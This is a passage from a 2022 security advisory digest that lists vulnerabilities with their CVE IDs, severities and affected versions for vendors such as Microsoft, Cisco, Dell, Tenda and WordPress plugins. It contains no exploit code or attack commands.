Endpoint (F1E) with Policy Engine versions prior to 8.8.2, Forcepoint Web Security Content
Gateway versions prior to 8.5.5, Forcepoint Email Security with DLP enabled versions prior
to 8.5.5, and Forcepoint Cloud Security Gateway prior to June 20, 2022.
CVE ID: CVE-2022-1700 (Critical)
A bypass a protection mechanism vulnerability has been discovered in Pebble Templates that
allows arbitrary code execution with springbok. The affected version is Pebble Templates
3.1.5.
CVE ID: CVE-2022-37767 (Critical)
An arbitrary file write vulnerability via the fullFilePath parameter at /api/upload-resource
has been discovered in Casdoor. The affected version is Casdoor v1.97.3.
CVE ID: CVE-2022-38638 (Critical)
OpenAM Consortium has released a security update to address an open redirect vulnerability
in OpenAM (OpenAM Consortium Edition). The affected version is OpenAM (OpenAM Consortium
Edition) 14.0.0.
CVE ID: CVE-2022-31735 (Medium)
EC-CUBE has released security updates to resolve multiple vulnerabilities in EC-CUBE
products. The affected versions are EC-CUBE 3.0.0 to 3.0.18-p4 (EC-CUBE 3 series), and
EC-CUBE 4.0.0 to 4.1.2 (EC-CUBE 4 series).
CVE ID: CVE-2022-40199 (Low), CVE-2022-38975 (Medium)
EC-CUBE has released security updates to resolve an insufficient verification vulnerability
when uploading files in EC-CUBE Product Image Bulk Upload Plugin. The affected versions are
Product Image Bulk Upload Plugin 1.0.0, and Product Image Bulk Upload Plugin 4.1.0.
CVE ID: CVE-2022-37346 (Medium)
Ubuntu has released security updates to address a vulnerability in Intel Microcode that can
allow to compromise SGX enclaves. The affected products are Ubuntu 22.04 LTS, Ubuntu 20.04
LTS & Ubuntu 18.04 LTS.
CVE ID: CVE-2022-21233 (Medium)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20846 (Medium), CVE-2022-20845 (Medium), CVE-2022-20849
(Medium)
Palo Alto Networks has released security updates to resolve multiple vulnerabilities in
Cortex XDR Agent . For information PAN-OS software is unaffected by the NVIDIA Dataplane
Development Kit (DPDK) vulnerability (CVE-2022-28199) and does not impact Palo Alto Networks
PA-Series (hardware) firewalls, VM-Series (virtual) firewalls, CN-Series (container)
firewalls, Panorama virtual appliances, Panorama M-Series appliances, Cloud NGFW customers,
or Prisma Access customers.
CVE ID: CVE-2022-0029 (Medium)
Dell has released a security update to address a regular expression Denial of Service (DoS)
vulnerability in Dell Wyse ThinOS. The affected versions are Dell Wyse ThinOS 9.3.1129 and
earlier versions.
CVE ID: CVE-2022-34402 (Medium)
Google has released Chrome Beta 106 (106.0.5249.38) for Android, Beta channel 106.0.5249.36
(Platform version: 15054.50.0/15054.51.0) for most ChromeOS devices, Beta channel
106.0.5249.40 for Windows, Mac & Linux, and Stable channel 105.0.5195.125 for Mac & Linux to
resolve multiple vulnerabilities.
CVE ID: CVE-2022-3196 (High), CVE-2022-3197 (High), CVE-2022-3198 (High),
CVE-2022-3199 (High), CVE-2022-3200 (High), CVE-2022-3201 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been observed that threat actors are exploiting multiple vulnerabilities in Fortinet
FortiOS and Microsoft Exchange servers for data extortion and disk encryption for ransom
operations.
CVE ID: CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, CVE-2021-34473,
CVE-2021-34523, CVE-2021-31207
Microsoft has released security updates to address multiple
vulnerabilities in its products. An attacker can exploit these vulnerabilities to take
control of an affected system.
Multiple SQL injection
vulnerabilities have been discovered in Archery. The affected
versions are Archery v1.8.3 to v1.8.5. CVE ID: CVE-2022-38541
(Critical)
A SQL injection
vulnerability has been discovered in Library Management System.
The affected version is Library Management System 1.0. CVE
ID: CVE-2022-37794 (Critical)
A XML External Entity
vulnerability has been discovered in Apache Calcite. The affected
versions are Apache Calcite version prior to 1.32.0. CVE
ID: CVE-2022-39135 (Critical)
A Server-Side Request
Forgery (SSRF) vulnerability has been discovered in Rank Math SEO
plugin for WordPress. The affected versions are Rank Math SEO
plugin 1.0.95 and below. CVE ID: CVE-2022-36376
(Critical)
XWiki has released
security updates to address a vulnerability in XWiki Platform Web
Parent POM. The affected versions are XWiki 1.0 and prior to
versions 13.10.6 and 14.30-rc-1. CVE ID: CVE-2022-36094
(Critical)
It has been discovered
that Inoda OnTrack employs a weak password policy which allows
attackers to potentially gain unauthorized access to the
application via brute-force attacks. The affected version is
Inoda OnTrack v3.4. CVE ID: CVE-2022-37164
(Critical)
Multiple improper access control vulnerabilities have been discovered in Zoom On-Premise
Meeting Connector MMR. The affected versions are Zoom On-Premise Meeting Connector MMR
before version 4.8.20220815.130.
CVE ID: CVE-2022-28760 (Medium), CVE-2022-28758 (High), CVE-2022-28759
(High)
Debian has released a security update to address multiple vulnerabilities in FreeCAD
package, which can result in the execution of arbitrary shell commands when opening a
malformed file.
CVE ID: CVE-2021-45844 (High), CVE-2021-45845 (High)
Honeywell has released security updates to address multiple vulnerabilities in its
equipment- SoftMaster. Successful exploitation of these vulnerabilities can allow to execute
code in the context of the application permissions or escalate privileges.
CVE ID: CVE-2022-2333 (High), CVE-2022-2332 (Medium)
Adobe has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit some of these vulnerabilities to take control of an affected system.
Citrix has released security update to address a vulnerability in Citrix Hypervisor 8.2 LTSR
CU1 Hotfix XS82ECU1008 (only) that can allow malicious network traffic to cause subsequent
packets to be dropped.
CVE ID: CVE-2020-35498 (High)
Dell has released security updates to resolve multiple vulnerabilities in third party
components used in Dell NetWorker vProxy. The affected versions are NetWorker vProxy
4.3.0-22 and earlier.
Google has released Chrome Stable 105 (105.0.5195.129) for iOS, Extended Stable channel
104.0.5112.124 for Windows & 104.0.5112.123 for Mac, and Chrome 105 (105.0.5195.124) for
Android.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
SAP has released security updates to address several vulnerabilities affecting multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-2191 (High), CVE-2022-31160 (Medium), CVE-2022-2047 (Low),
CVE-2022-2048 (High)
Microsoft has released security updates to address a Remote Code Execution (RCE)
vulnerability in Windows Internet Key Exchange (IKE) Protocol Extensions affecting multiple
Windows products.
CVE ID: CVE-2022-34722 (Critical)
Microsoft has released security updates to address a Remote Code Execution (RCE)
vulnerability in Windows Internet Key Exchange (IKE) Protocol Extensions affecting multiple
Windows products.
CVE ID: CVE-2022-34721 (Critical)
Microsoft has released security updates to address a Remote Code Execution (RCE)
vulnerability in Windows TCP/IP affecting multiple Windows products.
CVE ID: CVE-2022-34718 (Critical)
XWiki has released security updates to address a vulnerability in XWiki Platform Mentions
UI. The affected versions are XWiki 12.5-rc-1 and prior to versions 13.10.6 and 14.4.
CVE ID: CVE-2022-36098 (Critical)
XWiki has released security updates to address a vulnerability in XWiki Platform Mentions
UI. The affected versions are XWiki prior to versions 13.10.6 and 14.3.
CVE ID: CVE-2022-36096 (Critical)
It has been discovered that Bminusl IHateToBudget employs a weak password policy, which
allows to gain unauthorized access to the application via brute-force attacks. The affected
version is Bminusl IHateToBudget v1.5.7.
CVE ID: CVE-2022-37163 (Critical)
QNAP NAS has released security updates to address an externally controlled reference to a
resource vulnerability that affects QNAP NAS running Photo Station. The affected products
are QTS 5.0.1: Photo Station 6.1.2 and later, QTS 5.0.0/4.5.x: Photo Station 6.0.22 and
later, QTS 4.3.6: Photo Station 5.7.18 and later, QTS 4.3.3: Photo Station 5.4.15 and later,
and QTS 4.2.6: Photo Station 5.2.14 and later.
CVE ID: CVE-2022-27593 (Critical)
Delta Industrial Automation has released a security update to address a use of hard-coded
credentials vulnerability in its equipment- DIAEnergie that can lead to Remote Code
Execution (RCE). The affected products are DIAEnergie version 1.8.0 and prior.
An improper authentication vulnerability has been discovered in Kingspan's Equipment- TMS300
CS, which does not properly restrict access to endpoints. Successful exploitation of this
vulnerability can allow to view and modify application settings without authenticating.
CVE ID: CVE-2022-2757 (Critical)
Trend Micro has released security updates to address a vulnerability in Trend Micro Apex One
and Trend Micro Apex One as a Service that allow to log in to the product's administration
console & can execute an arbitrary code.
CVE ID: CVE-2022-40139 (High)
Schneider Electric has released security updates to resolve multiple vulnerabilities in its
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Dell has released security updates to address multiple vulnerabilities in Dell BSAFE SSL-J,
Dell BSAFE Crypto-J, and Dell AppSync.
CVE ID: CVE-2021-46827 (Medium)
Apple has released latest version of Safari 16 for macOS Big Sur & macOS Monterey, tvOS 16
for Apple TV 4K, Apple TV 4K (2nd generation), & Apple TV HD, watchOS 9 for Apple Watch
Series 4 & later, iOS 16 for iPhone 8 & later, macOS Monterey 12.6 for macOS Monterey, macOS
Big Sur 11.7 for macOS Big Sur and iOS 15.7 and iPadOS 15.7 for iPhone 6s & later, iPad Pro
(all models), iPad Air 2 & later, iPad 5th generation & later, iPad mini 4 & later, and iPod
touch (7th generation) to resolve multiple vulnerabilities.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A stack buffer overflow vulnerability has been discovered in xhyve commit dfbe09b via the
component pci_vtrnd_notify().
CVE ID: CVE-2022-36660 (Critical)
A heap-based buffer over-read or buffer overflow vulnerability has been discovered in zlib.
The affected version is zlib through 1.2.12.
CVE ID: CVE-2022-37434 (Critical)
Ubuntu has released security updates to address multiple vulnerabilities in LibTIFF that can
cause Denial of Service (DoS) or expose sensitive information. The affected products are
Ubuntu 18.04 LTS & Ubuntu 20.04 LTS.
CVE ID: CVE-2022-0907 (Medium), CVE-2022-0908 (Medium), CVE-2022-0909 (Medium),
CVE-2022-0924 (Medium), CVE-2022-22844 (Medium)
Debian has released a security update to address multiple heap-based buffer overflow
vulnerabilities in gdk-pixbuf package, which can result in the execution of arbitrary code
or Denial of Service (DoS) if a malformed GIF image is processed.
CVE ID: CVE-2021-44648 (High), CVE-2021-46829 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2018-1285 (Critical), CVE-2019-17498 (High), CVE-2022-2191 (High),
CVE-2022-31144 (High), CVE-2022-31151 (Medium), CVE-2022-31160 (Medium), CVE-2022-36313
(Medium), CVE-2022-2047 (Low), CVE-2022-2048 (High), CVE-2022-1651 (High), CVE-2022-25647
(High), CVE-2022-37434 (Critical), CVE-2022-31097 (Medium), CVE-2022-31107 (High),
CVE-2022-36879 (Medium), CVE-2022-36946 (High)
ARK-Web has released security updates to address a cross-site scripting vulnerability in
Movable Type plugin A-Form. The affected versions are A-Form versions prior to 4.1.1 (for
Movable Type 7 Series), and A-Form versions prior to 3.9.1 (for Movable Type 6 Series).
CVE ID: CVE-2022-38972 (Medium)
Ubuntu has released security updates to address multiple vulnerabilities in Linux kernel for
Microsoft Azure CVM cloud systems that can cause a Denial of Service (DoS) or possibly
execute arbitrary code. The affected product is Ubuntu 20.04 LTS.
CVE ID: CVE-2021-33061 (Medium), CVE-2021-33656 (High)
A Denial of Service (DoS) vulnerability has been discovered in bundled Jetty that affects
Jenkins. The affected products are Jenkins LTS 2.346.3 & earlier and Jenkins weekly up to
and including 2.362 bundle versions of Jetty The updates are available.
CVE ID: CVE-2022-2048 (High)
Dell has released security updates to address a vulnerability in Oxygen XML WebHelp, a
third-party component, that affects Dell Unisphere for PowerMax, Dell Unisphere for PowerMax
Virtual Appliance, Dell Solutions Enabler Virtual Appliance, Dell eVASA Provider Virtual
Appliance, Dell VASA Provider Standalone, and Dell PowerMaxOS.
CVE ID: CVE-2021-46827 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
An unauthenticated plugin settings change & data deletion vulnerabilities have been
discovered in WP Shop plugin for WordPress. The affected versions are WP Shop plugin 3.9.6
and below.
CVE ID: CVE-2022-36793 (Critical)
A Server-Side Request Forgery (SSRF) vulnerability has been discovered in Canto Cumulus that
allows attackers to enumerate the internal network, overload network resources, and possibly
have unspecified other impact. The affected versions are Canto Cumulus through 11.1.3.
CVE ID: CVE-2022-40305 (Critical)
A buffer overflow vulnerability has been discovered in D-Link. The affected version is
D-Link DAP1650 v1.04 firmware.
CVE ID: CVE-2022-36588 (Critical)
A buffer overflow vulnerability has been discovered in Tenda. The affected version is Tenda
G3 US_G3V3.0br_V15.11.0.6(7663)_EN_TDE.
CVE ID: CVE-2022-36586 (Critical)
A buffer overflow vulnerability has been discovered in Tenda. The affected version is Tenda
G3 US_G3V3.0br_V15.11.0.6(7663)_EN_TDE.
CVE ID: CVE-2022-36585 (Critical)
A SQL injection vulnerability has been discovered in Nagios XI via the mib_name parameter at
the Manage MIBs page. The affected version is Nagios XI v5.8.6.
CVE ID: CVE-2022-38250 (Critical)
It has been discovered that Gluu Oxauth allows to execute blind Server-Side Request Forgery
(SSRF) attacks via a crafted request_uri parameter. The affected versions are Gluu Oxauth
before v4.4.1.
CVE ID: CVE-2022-36663 (Critical)
A deserialization of an untrusted data vulnerability has been discovered in the message
processing component of Bitdefender GravityZone Console, which allows to pass unsafe
commands to the environment. The affected versions are Bitdefender GravityZone Console
On-Premise versions prior to 6.29.2-1, and Bitdefender GravityZone Cloud Console versions
prior to 6.27.2-2.
CVE ID: CVE-2022-2830 (Critical)
A session fixation vulnerability has been discovered in Apache Airflow. The affected
versions are Apache Airflow 2.2.4 through 2.3.3.
CVE ID: CVE-2022-38054 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Baxter has released security updates and mitigations to resolve multiple vulnerabilities in
its equipment- Sigma and Baxter Spectrum Infusion Pumps. Successful exploitation of these
vulnerabilities can result in access to sensitive data and alteration of system
configuration.
CVE ID: CVE-2022-26390 (Medium), CVE-2022-26392 (Medium), CVE-2022-26393 (Medium),
CVE-2022-26394 (Medium)
Hillrom has released security updates to address Out-of-Bounds Write, and Out-of-Bounds Read
vulnerabilities in its Equipment- Welch Allyn medical device management tools. Successful
exploitation of these vulnerabilities can allow an attacker to cause memory corruption and
remotely execute arbitrary code.
CVE ID: CVE-2021-27408 (Medium), CVE-2021-27410 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
NETGEAR has released security update to address multiple vulnerabilities in FunJSQ, a
third-party module integrated on some routers and Orbi WiFi Systems.
Missing Access Control vulnerability has been discovered in PHP Crafts Accommodation System
plugin. The affected versions are PHP Crafts Accommodation System plugin 1.0.1 and below.
CVE ID: CVE-2022-37344 (Critical)
Missing Access Control vulnerability has been discovered in About Rentals plugin for
WordPress. The affected versions are About Rentals plugin 1.5 and below.
CVE ID: CVE-2022-36427 (Critical)
Broken Access Control vulnerability has been discovered in Alessio Caiazza's About Me plugin
for WordPress. The affected versions are Alessio Caiazza's About Me plugin 1.0.12 and below.
CVE ID: CVE-2022-36387 (Critical)
Broken Access Control vulnerability has been discovered in Beaver Builder plugin for
WordPress. The affected versions are Beaver Builder plugin 2.5.4.3 and below.
CVE ID: CVE-2022-36425 (Critical)
A vulnerability has been discovered in OpenRemote that allows attackers to execute arbitrary
code via a crafted Groovy rule. The affected versions are OpenRemote through 1.0.4.
CVE ID: CVE-2022-31860 (Critical)
It has been discovered that Eclipse TCF debug interface in JasMiner-X4-Server is open on
port 1534. This vulnerability allows unauthenticated attackers to gain root privileges on
the affected device and access sensitive data or execute arbitrary commands. The affected
versions are Eclipse TCF debug interface in JasMiner-X4-Server-20220621-090907 and below.
CVE ID: CVE-2022-36601 (Critical)
A format string vulnerability has been discovered in Zyxel NAS326 firmware that allow an
attacker to achieve unauthorized remote code execution via a crafted UDP packet. The
affected versions are Zyxel NAS326 firmware versions prior to V5.21(AAZF.12)C0.
CVE ID: CVE-2022-34747 (Critical)
Apache OFBiz has released security update for Solr plugin to address a vulnerability. An
attacker can exploit this vulnerability at server start-up or on a server restart, in order
to run arbitrary code. The affected versions are OFBiz prior to 18.12.06.
CVE ID: CVE-2022-29063 (Critical)
A buffer overflow vulnerability has been discovered in Tenda. The affected version is Tenda
G3 US_G3V3.0br_V15.11.0.6(7663)_EN_TDE.
CVE ID: CVE-2022-36584 (Critical)
MZ Automation GmbH has released security updates to resolve multiple vulnerabilities in its
equipment- libIEC61850. Successful exploitation of these vulnerabilities can crash the
device being accessed, and buffer overflow conditions can allow remote code execution.
CVE ID: CVE-2022-2970 (Critical), CVE-2022-2972 (Critical), CVE-2022-2971 (High),
CVE-2022-2973 (High)
Apache has released security updates to address a Denial of Service (DoS) vulnerability in
Apache Struts 2. The affected versions are Struts 2.0.0 to 2.5.20.
CVE ID: CVE-2019-0233 (Medium)
An access bypass vulnerability has been discovered in Permissions by Term, and Next.js,
third-party libraries used by Drupal. The updates are available.
Ubuntu has released security updates to address a vulnerability in Dnsmasq package that can
cause DNS cache poisoning attacks. The affected products are Ubuntu 16.04 ESM.
CVE ID: CVE-2021-3448 (Medium)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20696 (High), CVE-2022-28199 (High), CVE-2022-20863 (Medium),
CVE-2022-20923 (Medium)
Google has released Chrome Beta 106 (106.0.5249.30) for iOS, Chrome Beta 106 (106.0.5249.31)
for Android, Beta channel 106.0.5249.30 for Windows, Mac and Linux, and Stable channel
105.0.5195.112 (Platform version: 14989.85.0) for most ChromeOS devices to resolve multiple
vulnerabilities.
CVE ID: CVE-2022-3071 (High), CVE-2022-3052 (Medium), CVE-2022-2859
(Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released a security update to address a deserialization vulnerability in
libgoogle-gson-java package that can lead to a Denial of Service (DoS) or even the execution
of arbitrary code.
CVE ID: CVE-2022-25647 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-1651 (High), CVE-2021-33149 (Low), CVE-2022-24436 (Medium),
CVE-2021-0060 (High), CVE-2021-0127 (Medium), CVE-2020-12357 (High), CVE-2020-12358
(Medium), CVE-2020-12359 (High), CVE-2020-12360 (Medium), CVE-2020-24486 (Medium),
CVE-2020-8670 (High), CVE-2020-8700 (High), CVE-2020-24511 (Medium), CVE-2020-24512
(Low)
A local file disclosure vulnerability has been discovered in Telos Alliance Omnia MPX Node,
which allows attackers to escalate privileges to root and execute arbitrary commands. The
affected versions are Telos Alliance Omnia MPX Node through 1.5.0+r1.
CVE ID: CVE-2022-36642 (Critical)
A SQL injection vulnerability has been discovered in Online Food Ordering System. The
affected version is Online Food Ordering System v1.0.
CVE ID: CVE-2022-36759 (Critical)
Remote Code Execution (RCE) vulnerability has been discovered in Apache OFBiz. The affected
versions are Apache OFBiz release 18.12.05 and earlier.
CVE ID: CVE-2022-25371 (Critical)
It has been discovered that in D-Link DIR-816 A2_v1.10CNB04.img the network can be
initialized without authentication via /goform/wizard_end.
CVE ID: CVE-2022-37128 (Critical)
A command injection vulnerability has been discovered in Rpi-Jukebox-RFID. The affected
version is RPi-Jukebox-RFID v2.3.0.
CVE ID: CVE-2022-36749 (Critical)
Qualcomm has released security bulletin to address multiple vulnerabilities affecting its
devices.
CVE ID: CVE-2022-25708 (Critical), CVE-2022-25652 (Critical), CVE-2022-22105
(Critical)
It has been discovered that Vice Society ransomware is obtaining initial network access
through compromised credentials by exploiting internet-facing applications and exploiting
the PrintNightmare vulnerability (CVE-2021-1675 and CVE-2021-34527 ) to escalate privileges.
Mitigations are available.
Multiple vulnerabilities have been discovered in Delta Electronics' Equipment- DOPSoft 2
that can allow arbitrary code execution. The affected products are DOPSoft 2 version 2.00.07
and prior. DOPSoft 2 will not receive an update to mitigate these vulnerabilities because it
is an End-of-Life (EoL) product.
CVE ID: CVE-2021-38402 (High), CVE-2021-38406 (High), CVE-2021-38404
(High)
An access of uninitialized pointer vulnerability has been discovered in Triangle Microworks'
Equipment- TMW IEC 61850 Software Library and TMW IEC 60870-6 (ICCP/TASE.2) Software
Library. Successful exploitation can lead to a Denial of Service (DoS) condition to any
server or client using the affected libraries.
CVE ID: CVE-2022-38138 (High)
AVEVA has released security updates to address multiple vulnerabilities in its equipment-
AVEVA Edge 2020 R2 SP1 and all prior versions. Successful exploitation can result in
arbitrary code execution, information disclosure, or Denial of Service (DoS).
CVE ID: CVE-2022-36970 (High), CVE-2022-28686 (High), CVE-2022-28687 (High),
CVE-2022-28688 (High), CVE-2022-28685 (High), CVE-2022-36969 (Medium)
WordPress has released security updates to address a stored Cross-Site Scripting (XSS)
vulnerability in Wordfence Security Firewall & Malware Scan plugin for WordPress. The
affected versions are Wordfence Security Firewall & Malware Scan versions up to, and
including 7.6.0.
CVE ID: CVE-2022-3144 (Medium)
Dell has released security updates to address multiple vulnerabilities in Bash, a
third-party component, that affects Dell PowerScale OneFS.
CVE ID: CVE-2019-9924 (High), CVE-2019-18276 (High), CVE-2016-7543 (High),
CVE-2016-9401 (Medium)
HP has released security updates to address a privilege escalation vulnerability in HP
Support Assistant. The affected products are HP Support Assistant versions earlier than
9.11, and Fusion versions earlier than 1.38.2601.0.
CVE ID: CVE-2022-38395 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-1049 (High), CVE-2022-2735, CVE-2022-3075, CVE-2022-27337 (Medium),
CVE-2022-38784 (High)
Android has released security bulletin to resolve multiple vulnerabilities affecting several
Android devices. Security patch levels of 2022-09-05 or later, address all of these issues.
An incorrect access control vulnerability has been discovered in Doctor's Appointment
System via edoc/patient/settings.php. The affected version is Doctor's Appointment System
1.0.
CVE ID: CVE-2022-36202 (Critical)
A SQL Injection vulnerability has been discovered in Doctor's Appointment System. The
affected version is Doctor's Appointment System 1.0.
CVE ID: CVE-2022-36201 (Critical)
A command injection vulnerability has been discovered in Rengine via the scan engine
function. The affected version is Rengine v1.3.0.
CVE ID: CVE-2022-36566 (Critical)
It has been discovered that Quarkus does not terminate HTTP requests header context, which
can lead to unpredictable behavior. The affected version is Quarkus 2.10.x.
CVE ID: CVE-2022-2466 (Critical)
It has been discovered that Tenda AC6(AC1200) contains a vulnerability that allows to remove
the Wi-Fi password and force the device into open security mode via a crafted packet sent to
goform/setWizard. The affected versions are Tenda AC6(AC1200) v5.0 Firmware v02.03.01.114
and below.
CVE ID: CVE-2022-37176 (Critical)
A command injection vulnerability has been discovered WAVLINK that allows to execute
arbitrary commands via the username parameter. The affected version is WAVLINK WL-WN575A3
RPT75A3.V4300.201217.
CVE ID: CVE-2022-37149 (Critical)
Cognex has released security updates to address multiple vulnerabilities in its equipment-
3D-A1000 Dimensioning System. Successful exploitation can result in unauthorised password
changes, escalation of privileges, falsifying of password logs, and bypassing of web access
controls.
CVE ID: CVE-2022-1368 (Critical), CVE-2022-1522 (Medium), CVE-2022-1525
(Critical)
Hitachi Energy has released security updates & mitigations to address multiple
vulnerabilities in Hitachi Energy's Equipment- AFS660/AFS665 series, and MicroSCADA Pro/X
SYS600 products. An attacker can exploit these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2020-6994 (Critical), CVE-2022-0778 (High), CVE-2020-25692 (High),
CVE-2022-1778 (High), CVE-2022-2277 (High), CVE-2022-29922 (High), CVE-2022-29490 (High),
CVE-2022-29492 (Medium)
A reflected Cross-Site Scripting (XSS) vulnerability has been discovered in the Desktop
Laptop Option (DLO) application login page. Successful exploitation allows to inject
arbitrary web script into the HTTP parameter which reflects the user input without
sanitization due to improper neutralization of input during Web Page Generation. The
affected versions are Veritas Desktop Laptop Option (DLO) versions 9.7, 9.6, 9.5, 9.4,
9.3.3, 9.3.2, 9.3.1, 9.3, 9.2, 9.1 and earlier unsupported versions.
Ubuntu has released security updates to address several vulnerabilities in Linux kernel. An
attacker can exploit these vulnerabilities to take control of an affected system.
GitLab has released Community Edition and Enterprise Edition version 15.3.3 to resolve a
number of regressions and bugs in 15.3 release and prior versions.
SYNCK GRAPHICA has a released security update to address an information disclosure
vulnerability in Mailform Pro CGI. The affected version is Mailform Pro CGI 4.3.1 and
earlier.
CVE ID: CVE-2022-38400 (Low)
HarmonyOS has released a security bulletin to address multiple vulnerabilities affecting
several Huawei phones and tablets that run HarmonyOS. Security patch levels of 2022-09-01 or
later address all of these issues.
CVE ID: CVE-2022-38990 (Critical), CVE-2022-38993 (Critical), CVE-2022-39006
(Critical), CVE-2022-38987 (Critical)
QNAP has released security updates to fix vulnerability related to Deadbolt ransomware
attack on QNAP NAS devices running Photo Station with internet exposure. The affected
products are QTS 5.0.1: Photo Station 6.1.2 and later, QTS 5.0.0/4.5.x: Photo Station 6.0.22
and later, QTS 4.3.6: Photo Station 5.7.18 and later, QTS 4.3.3: Photo Station 5.4.15 and
later and QTS 4.2.6: Photo Station 5.2.14 and later.
Google has released Extended Stable channel 104.0.5112.114 for Windows and Mac, Chrome 105
(105.0.5195.77) for Android, Chrome Beta 106 (106.0.5249.23) for Android, and Stable channel
105.0.5195.102 for Windows, Mac and Linux to resolve the vulnerability. An exploit for an
insufficient data validation vulnerability (CVE-2022-3075) exists in the wild.
CVE ID: CVE-2022-3075 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cisco released a security update to resolve a vulnerability in the MPLS Operation,
Administration, and Maintenance (OAM) feature of Cisco NX-OS Software that can cause a
Denial of Service (DoS) condition on an affected device.
CVE ID: CVE-2021-1588 (High)
WordPress has released security updates to address a security protection bypass
vulnerability in WP Cerber Security, Anti-spam & Malware Scan plugin for WordPress. The
affected versions are WP Cerber Security, Anti-spam & Malware Scan versions up to, and
including 9.1.
CVE ID: CVE-2022-2939 (Medium)
Microsoft has released an updated Microsoft Edge Stable Channel (Version 105.0.1343.27).
This update contains a fix for CVE-2022-3075, which has an exploit in the wild.
A SQL injection vulnerability has been discovered in Clinic's Patient Management System via
the id parameter at /pms/update_patient.php. The affected version is Clinic's Patient
Management System v1.0.
CVE ID: CVE-2022-36609 (Critical)
A SQL injection vulnerability has been discovered in Mapper via the ids parameter in the
selectByIds function. The affected versions are Mapper v4.0.0 to v4.2.0.
CVE ID: CVE-2022-36594 (Critical)
It has been discovered that Seiko SkyBridge MB-A200 v01.00.04 and below contains multiple
hard-coded passcodes for root. Adversaries are able to access the passcodes at
/etc/srapi/config/system.conf and /usr/sbin/ssol-sshd.sh.
CVE ID: CVE-2022-36560 (Critical)
A command injection vulnerability has been discovered in Seiko SkyBridge MB-A200 via the
Ping parameter at ping_exec.cgi. The affected versions are Seiko SkyBridge MB-A200 v01.00.04
and below.
CVE ID: CVE-2022-36559 (Critical)
A command injection vulnerability has been discovered in Seiko SkyBridge MB-A100/A110 via
the ipAddress parameter at 07system08execute_ping_01. The affected versions are Seiko
SkyBridge MB-A100/A110 v4.2.0 and below.
CVE ID: CVE-2022-36556 (Critical)
A command injection vulnerability has been discovered in Hytec Inter HWL-2511-SS via the
component /www/cgi-bin/popen.cgi. The affected versions are Hytec Inter HWL-2511-SS v1.05
and below.
CVE ID: CVE-2022-36553 (Critical)
Alfasad has released security updates to address a command injection vulnerability in the
PowerCMS XMLRPC API. The affected versions are PowerCMS 6.021 and earlier, PowerCMS 5.21 and
earlier, PowerCMS 4.51 and earlier and PowerCMS 3 Series and earlier ( which are unsupported
(End-of-Life (EOL)) versions).
CVE ID: CVE-2022-33941 (Critical)
An OS command injection vulnerability via ReaderNo has been discovered in Nortek Linear
eMerge E3-Series devices before 0.32-08f.
CVE ID: CVE-2022-31499 (Critical)
It has been discovered that Printix Secure Cloud Print Management incorrectly used
privileged APIs to modify values in HKEY_LOCAL_MACHINE via UITasks.PersistentRegistryData.
The affected versions are Printix Secure Cloud Print Management through 1.3.1106.0.
CVE ID: CVE-2022-25089 (Critical)
Multiple vulnerabilities have been discovered in UNISOC's BootROM. An attacker can exploit
these vulnerabilities to take control of an affected system. The mitigations are available.
CVE ID: CVE-2022-38691 (Critical), CVE-2022-38692 (Critical),CVE-2022-38693 (High),
CVE-2022-38694 (High), CVE-2022-38695 (Medium), CVE-2022-38696 (Medium)
Debian has released a security update to address multiple vulnerabilities in Chromium, which
can result in the execution of arbitrary code, Denial of Service (DoS) or information
disclosure.
CVE ID: CVE-2022-3038, CVE-2022-3039, CVE-2022-3040, CVE-2022-3041, CVE-2022-3042,
CVE-2022-3043, CVE-2022-3044, CVE-2022-3045, CVE-2022-3046, CVE-2022-3047, CVE-2022-3048,
CVE-2022-3049, CVE-2022-3050, CVE-2022-3051, CVE-2022-3052, CVE-2022-3053, CVE-2022-3054,
CVE-2022-3055, CVE-2022-3056, CVE-2022-3057, CVE-2022-3058, CVE-2022-3071
It has been discovered that Hytec Inter HWL-2511-SS implements a SHA512crypt hash for the
root account which can be easily cracked via a brute-force attack. The affected versions are
Hytec Inter HWL-2511-SS v1.05 and below.
CVE ID: CVE-2022-36555 (Critical)
A command injection vulnerability has been discovered in the CLI (Command Line Interface)
implementation of Hytec Inter HWL-2511-SS that allows attackers to execute arbitrary
commands with root privileges. The affected versions are Hytec Inter HWL-2511-SS v1.05 and
below.
CVE ID: CVE-2022-36554 (Critical)
A SQL injection vulnerability has been discovered in ApolloTheme AP PageBuilder component
for PrestaShop, that allows unauthenticated attackers to exfiltrate database data. The
affected versions are ApolloTheme AP PageBuilder component through 2.4.4.
